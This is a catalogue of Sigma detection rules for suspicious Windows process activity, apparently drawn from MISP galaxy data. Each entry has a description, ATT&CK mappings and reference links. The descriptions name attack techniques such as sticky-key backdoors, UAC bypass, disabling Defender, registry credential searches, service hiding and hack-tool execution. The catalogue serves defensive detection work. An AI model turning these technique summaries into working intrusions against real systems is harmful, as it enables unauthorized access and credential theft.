https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml

Mstsc.EXE Execution With Local RDP File

Detects potential RDP connection via Mstsc using a local ".rdp" file

The tag is: misp-galaxy:sigma-rules="Mstsc.EXE Execution With Local RDP File"

Mstsc.EXE Execution With Local RDP File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 10704. Table References

Links

https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/

https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_run_local_rdp_file.yml

HackTool - SILENTTRINITY Stager Execution

Detects SILENTTRINITY stager use via PE metadata

The tag is: misp-galaxy:sigma-rules="HackTool - SILENTTRINITY Stager Execution"

HackTool - SILENTTRINITY Stager Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 10705. Table References

Links

https://github.com/byt3bl33d3r/SILENTTRINITY

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_silenttrinity_stager.yml

Computer System Reconnaissance Via Wmic.EXE

Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc.

The tag is: misp-galaxy:sigma-rules="Computer System Reconnaissance Via Wmic.EXE"

Computer System Reconnaissance Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 10706. Table References

Links

https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_computersystem.yml

Always Install Elevated Windows Installer

Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege

The tag is: misp-galaxy:sigma-rules="Always Install Elevated Windows Installer"

Always Install Elevated Windows Installer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10707. Table References

Links

https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_always_install_elevated_windows_installer.yml

File Download From Browser Process Via Inline URL

Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state.

The tag is: misp-galaxy:sigma-rules="File Download From Browser Process Via Inline URL"

File Download From Browser Process Via Inline URL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10708. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Msedge/

https://twitter.com/mrd0x/status/1478116126005641220

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_inline_file_download.yml

Add Potential Suspicious New Download Source To Winget

Detects usage of winget to add new potentially suspicious download sources

The tag is: misp-galaxy:sigma-rules="Add Potential Suspicious New Download Source To Winget"

Add Potential Suspicious New Download Source To Winget has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10709. Table References

Links

https://learn.microsoft.com/en-us/windows/package-manager/winget/source

https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_add_susp_custom_source.yml

Suspicious Atbroker Execution

Detects Atbroker executing non-default Assistive Technology applications.

The tag is: misp-galaxy:sigma-rules="Suspicious Atbroker Execution"

Suspicious Atbroker Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10710. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Atbroker/

http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_atbroker.yml

DLL Execution via Rasautou.exe

Detects the use of Rasautou.exe to load an arbitrary DLL specified with the -d option and execute the export specified with the -p option.

The tag is: misp-galaxy:sigma-rules="DLL Execution via Rasautou.exe"

DLL Execution via Rasautou.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10711. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html

https://github.com/fireeye/DueDLLigence

https://lolbas-project.github.io/lolbas/Binaries/Rasautou/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml

Enumeration for Credentials in Registry

Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services

The tag is: misp-galaxy:sigma-rules="Enumeration for Credentials in Registry"

Enumeration for Credentials in Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials in Registry - T1552.002" with estimative-language:likelihood-probability="almost-certain"

Table 10712. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.002/T1552.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_enumeration_for_credentials_in_registry.yml

Suspicious VBoxDrvInst.exe Parameters

Detects VBoxDrvInst.exe run with parameters that allow processing an INF file. This allows creating values in the registry and installing drivers. For example, one could use this technique to obtain persistence by modifying one of the Run or RunOnce registry keys.

The tag is: misp-galaxy:sigma-rules="Suspicious VBoxDrvInst.exe Parameters"

Suspicious VBoxDrvInst.exe Parameters has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 10713. Table References

Links

https://twitter.com/pabraeken/status/993497996179492864

https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_virtualbox_vboxdrvinst_execution.yml

Base64 MZ Header In CommandLine

Detects encoded base64 MZ header in the commandline

The tag is: misp-galaxy:sigma-rules="Base64 MZ Header In CommandLine"

Table 10714. Table References

Links

https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_inline_base64_mz_header.yml

Suspicious File Download From IP Via Wget.EXE

Detects potentially suspicious file downloads directly from IP addresses using Wget.exe

The tag is: misp-galaxy:sigma-rules="Suspicious File Download From IP Via Wget.EXE"

Table 10715. Table References

Links

https://www.gnu.org/software/wget/manual/wget.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wget_download_direct_ip.yml

Scheduled Task Creation Via Schtasks.EXE

Detects the creation of scheduled tasks by user accounts via the "schtasks" utility.

The tag is: misp-galaxy:sigma-rules="Scheduled Task Creation Via Schtasks.EXE"

Scheduled Task Creation Via Schtasks.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 10716. Table References

Links

https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_creation.yml

HackTool - SharpMove Tool Execution

Detects, via its PE metadata and command line options, the execution of SharpMove, a .NET utility that performs multiple tasks such as "Task Creation", "SCM" queries and VBScript execution using WMI.

The tag is: misp-galaxy:sigma-rules="HackTool - SharpMove Tool Execution"

HackTool - SharpMove Tool Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 10717. Table References

Links

https://github.com/0xthirteen/SharpMove/

https://pentestlab.blog/tag/sharpmove/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharpmove.yml

Suspicious Serv-U Process Pattern

Detects a suspicious process pattern which could be a sign of an exploited Serv-U service

The tag is: misp-galaxy:sigma-rules="Suspicious Serv-U Process Pattern"

Suspicious Serv-U Process Pattern has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"

Table 10718. Table References

Links

https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_servu_susp_child_process.yml

Suspicious Where Execution

Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.

The tag is: misp-galaxy:sigma-rules="Suspicious Where Execution"

Suspicious Where Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Browser Information Discovery - T1217" with estimative-language:likelihood-probability="almost-certain"

Table 10719. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_where_browser_data_recon.yml

Whoami Utility Execution

Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation

The tag is: misp-galaxy:sigma-rules="Whoami Utility Execution"

Whoami Utility Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 10720. Table References

Links

https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/

https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_execution.yml

HackTool - WinPwn Execution

Detects command line keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.

The tag is: misp-galaxy:sigma-rules="HackTool - WinPwn Execution"

HackTool - WinPwn Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Service Discovery - T1046" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

Table 10721. Table References

Links

https://www.publicnow.com/view/EB87DB49C654D9B63995FAD4C9DE3D3CC4F6C3ED?1671634841

https://github.com/redcanaryco/atomic-red-team/blob/4d6c4e8e23d465af7a2388620cfe3f8c76e16cf0/atomics/T1082/T1082.md

https://reconshell.com/winpwn-tool-for-internal-windows-pentesting-and-ad-security/

https://github.com/S3cur3Th1sSh1t/WinPwn

repo[0]=redcanaryco/atomic-red-team

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_winpwn.yml

Potential NTLM Coercion Via Certutil.EXE

Detects possible NTLM coercion via certutil using the 'syncwithWU' flag

The tag is: misp-galaxy:sigma-rules="Potential NTLM Coercion Via Certutil.EXE"

Potential NTLM Coercion Via Certutil.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10722. Table References

Links

https://github.com/LOLBAS-Project/LOLBAS/issues/243

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml

Visual Studio Code Tunnel Execution

Detects Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel

The tag is: misp-galaxy:sigma-rules="Visual Studio Code Tunnel Execution"

Visual Studio Code Tunnel Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 10723. Table References

Links

https://ipfyx.fr/post/visual-studio-code-tunnel/

https://code.visualstudio.com/docs/remote/tunnels

https://badoption.eu/blog/2023/01/31/code_c2.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vscode_tunnel_execution.yml

Sdclt Child Processes

A general detection for sdclt spawning new processes. This could be an indicator of sdclt being used for UAC bypass techniques.

The tag is: misp-galaxy:sigma-rules="Sdclt Child Processes"

Sdclt Child Processes has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10724. Table References

Links

https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md

https://github.com/OTRF/detection-hackathon-apt29/issues/6

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdclt_child_process.yml

Windows Binary Executed From WSL

Detects the execution of Windows binaries from within a WSL instance. This could be used to masquerade parent-child relationships

The tag is: misp-galaxy:sigma-rules="Windows Binary Executed From WSL"

Windows Binary Executed From WSL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10725. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wsl_windows_binaries_execution.yml

HackTool - Wmiexec Default Powershell Command

Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script

The tag is: misp-galaxy:sigma-rules="HackTool - Wmiexec Default Powershell Command"

Table 10726. Table References

Links

https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_wmiexec_default_powershell.yml

Potential SquiblyTwo Technique Execution

Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields

The tag is: misp-galaxy:sigma-rules="Potential SquiblyTwo Technique Execution"

Potential SquiblyTwo Technique Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="XSL Script Processing - T1220" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

Table 10727. Table References

Links

https://twitter.com/mattifestation/status/986280382042595328

https://lolbas-project.github.io/lolbas/Binaries/Wmic/

https://atomicredteam.io/defense-evasion/T1220/

https://web.archive.org/web/20190209154607/https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml

Forfiles Command Execution

Detects the execution of "forfiles" with the "/c" flag. While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary. Can be used to bypass application whitelisting.

The tag is: misp-galaxy:sigma-rules="Forfiles Command Execution"

Forfiles Command Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10728. Table References

Links

https://pentestlab.blog/2020/07/06/indirect-command-execution/

https://lolbas-project.github.io/lolbas/Binaries/Forfiles/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_forfiles_proxy_execution_.yml

Suspicious Invoke-WebRequest Execution

Detects a suspicious call to the Invoke-WebRequest cmdlet where the output is written to a suspicious location.

The tag is: misp-galaxy:sigma-rules="Suspicious Invoke-WebRequest Execution"

Suspicious Invoke-WebRequest Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10729. Table References

Links

https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml

UAC Bypass Using Consent and Comctl32 - Process

Detects the pattern of UAC bypass using consent.exe and comctl32.dll (UACMe 22)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using Consent and Comctl32 - Process"

UAC Bypass Using Consent and Comctl32 - Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10730. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml

Ie4uinit Lolbin Use From Invalid Path

Detects use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file located in a directory other than the usual directories.

The tag is: misp-galaxy:sigma-rules="Ie4uinit Lolbin Use From Invalid Path"

Ie4uinit Lolbin Use From Invalid Path has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10731. Table References

Links

https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/

https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml

NtdllPipe Like Activity Execution

Detects commands that type the content of ntdll.dll to a different file or a pipe in order to evade AV/EDR detection, as seen being used in the NtdllPipe POC.

The tag is: misp-galaxy:sigma-rules="NtdllPipe Like Activity Execution"

Table 10732. Table References

Links

https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_ntdllpipe_redirect.yml

Security Service Disabled Via Reg.EXE

Detects execution of "reg.exe" to disable security services such as Windows Defender.

The tag is: misp-galaxy:sigma-rules="Security Service Disabled Via Reg.EXE"

Security Service Disabled Via Reg.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10733. Table References

Links

https://vms.drweb.fr/virus/?i=24144899

https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1

https://bidouillesecurity.com/disable-windows-defender-in-powershell/

https://twitter.com/JohnLaTwC/status/1415295021041979392

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_disable_sec_services.yml

PUA - Mouse Lock Execution

In Kaspersky’s 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents.

The tag is: misp-galaxy:sigma-rules="PUA - Mouse Lock Execution"

PUA - Mouse Lock Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="GUI Input Capture - T1056.002" with estimative-language:likelihood-probability="almost-certain"

Table 10734. Table References

Links

https://sourceforge.net/projects/mouselock/

https://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_mouselock_execution.yml

Firewall Rule Update Via Netsh.EXE

Detects execution of netsh with the "advfirewall" and "set" options in order to set new values for properties of an existing rule.

The tag is: misp-galaxy:sigma-rules="Firewall Rule Update Via Netsh.EXE"

Table 10735. Table References

Links

https://ss64.com/nt/netsh.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_set_rule.yml

Exports Registry Key To a File

Detects the export of the target Registry key to a file.

The tag is: misp-galaxy:sigma-rules="Exports Registry Key To a File"

Exports Registry Key To a File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

Table 10736. Table References

Links

https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

https://lolbas-project.github.io/lolbas/Binaries/Regedit/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_keys.yml

Persistence Via Sticky Key Backdoor

By replacing the sticky keys executable with the local admin's CMD executable, an attacker is able to access a privileged Windows console session without authenticating to the system. When the sticky keys are "activated" the privileged shell is launched.

The tag is: misp-galaxy:sigma-rules="Persistence Via Sticky Key Backdoor"

Persistence Via Sticky Key Backdoor has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008" with estimative-language:likelihood-probability="almost-certain"

Table 10738. Table References

Links

https://learn.microsoft.com/en-us/archive/blogs/jonathantrull/detecting-sticky-key-backdoors

https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html

https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_sticky_keys_replace.yml

Sticky Key Like Backdoor Execution

Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen

The tag is: misp-galaxy:sigma-rules="Sticky Key Like Backdoor Execution"

Sticky Key Like Backdoor Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008" with estimative-language:likelihood-probability="almost-certain"

Table 10739. Table References

Links

https://learn.microsoft.com/en-us/archive/blogs/jonathantrull/detecting-sticky-key-backdoors

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml

WmiPrvSE Spawned A Process

Detects WmiPrvSE spawning a process

The tag is: misp-galaxy:sigma-rules="WmiPrvSE Spawned A Process"

WmiPrvSE Spawned A Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 10740. Table References

Links

https://threathunterplaybook.com/hunts/windows/190815-RemoteServiceInstallation/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmiprvse_spawning_process.yml

XSL Script Execution Via WMIC.EXE

Detects the execution of WMIC with the "format" flag to potentially load XSL files. Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files.

The tag is: misp-galaxy:sigma-rules="XSL Script Execution Via WMIC.EXE"

XSL Script Execution Via WMIC.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="XSL Script Processing - T1220" with estimative-language:likelihood-probability="almost-certain"

Table 10741. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml

Suspicious Regsvr32 Execution From Remote Share

Detects REGSVR32.exe being used to execute a DLL hosted on a remote share.

The tag is: misp-galaxy:sigma-rules="Suspicious Regsvr32 Execution From Remote Share"

Suspicious Regsvr32 Execution From Remote Share has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Regsvr32 - T1218.010" with estimative-language:likelihood-probability="almost-certain"

Table 10742. Table References

Links

https://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_remote_share.yml

Abuse of Service Permissions to Hide Services Via Set-Service

Detects usage of the "Set-Service" PowerShell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service", etc. (Works only in PowerShell 7.)

The tag is: misp-galaxy:sigma-rules="Abuse of Service Permissions to Hide Services Via Set-Service"

Abuse of Service Permissions to Hide Services Via Set-Service has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Services Registry Permissions Weakness - T1574.011" with estimative-language:likelihood-probability="almost-certain"

Table 10743. Table References

Links

https://twitter.com/Alh4zr3d/status/1580925761996828672

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_hide_services_via_set_service.yml

Renamed Plink Execution

Detects the execution of a renamed version of the Plink binary.

The tag is: misp-galaxy:sigma-rules="Renamed Plink Execution"

Renamed Plink Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 10744. Table References

Links

https://the.earth.li/sgtatham/putty/0.58/htmldoc/Chapter7.html

https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_plink.yml

PUA - NPS Tunneling Tool Execution

Detects the use of NPS, a port forwarding and intranet penetration proxy server

The tag is: misp-galaxy:sigma-rules="PUA - NPS Tunneling Tool Execution"

PUA - NPS Tunneling Tool Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

Table 10745. Table References

Links

https://github.com/ehang-io/nps

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nps.yml

MMC Spawning Windows Shell

Detects a Windows command line executable started from MMC

The tag is: misp-galaxy:sigma-rules="MMC Spawning Windows Shell"

MMC Spawning Windows Shell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003" with estimative-language:likelihood-probability="almost-certain"

Table 10746. Table References

Links

https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mmc_susp_child_process.yml

Suspicious Scheduled Task Creation via Masqueraded XML File

Detects the creation of a scheduled task using the "-XML" flag with a file that lacks the '.xml' extension. This behavior could be indicative of a potential defense evasion attempt during persistence.

The tag is: misp-galaxy:sigma-rules="Suspicious Scheduled Task Creation via Masqueraded XML File"

Suspicious Scheduled Task Creation via Masqueraded XML File has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 10747. Table References

Links

https://github.com/elastic/protections-artifacts/blob/084067123d3328a823b1c3fdde305b694275c794/behavior/rules/persistence_suspicious_scheduled_task_creation_via_masqueraded_xml_file.toml

https://docs.microsoft.com/en-us/windows/win32/taskschd/daily-trigger-example--xml-

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml

Service DACL Abuse To Hide Services Via Sc.EXE

Detects usage of the "sc.exe" utility to add a new service with special permissions, as seen used by threat actors, which make the service hidden and unremovable.

The tag is: misp-galaxy:sigma-rules="Service DACL Abuse To Hide Services Via Sc.EXE"

Service DACL Abuse To Hide Services Via Sc.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Services Registry Permissions Weakness - T1574.011" with estimative-language:likelihood-probability="almost-certain"

Table 10748. Table References

Links

https://twitter.com/Alh4zr3d/status/1580925761996828672

https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html

https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/

https://www.sans.org/blog/red-team-tactics-hiding-windows-services/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml

Potential Process Injection Via Msra.EXE

Detects potential process injection via Microsoft Remote Assistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors for discovery and persistence tactics.

The tag is: misp-galaxy:sigma-rules="Potential Process Injection Via Msra.EXE"

Potential Process Injection Via Msra.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

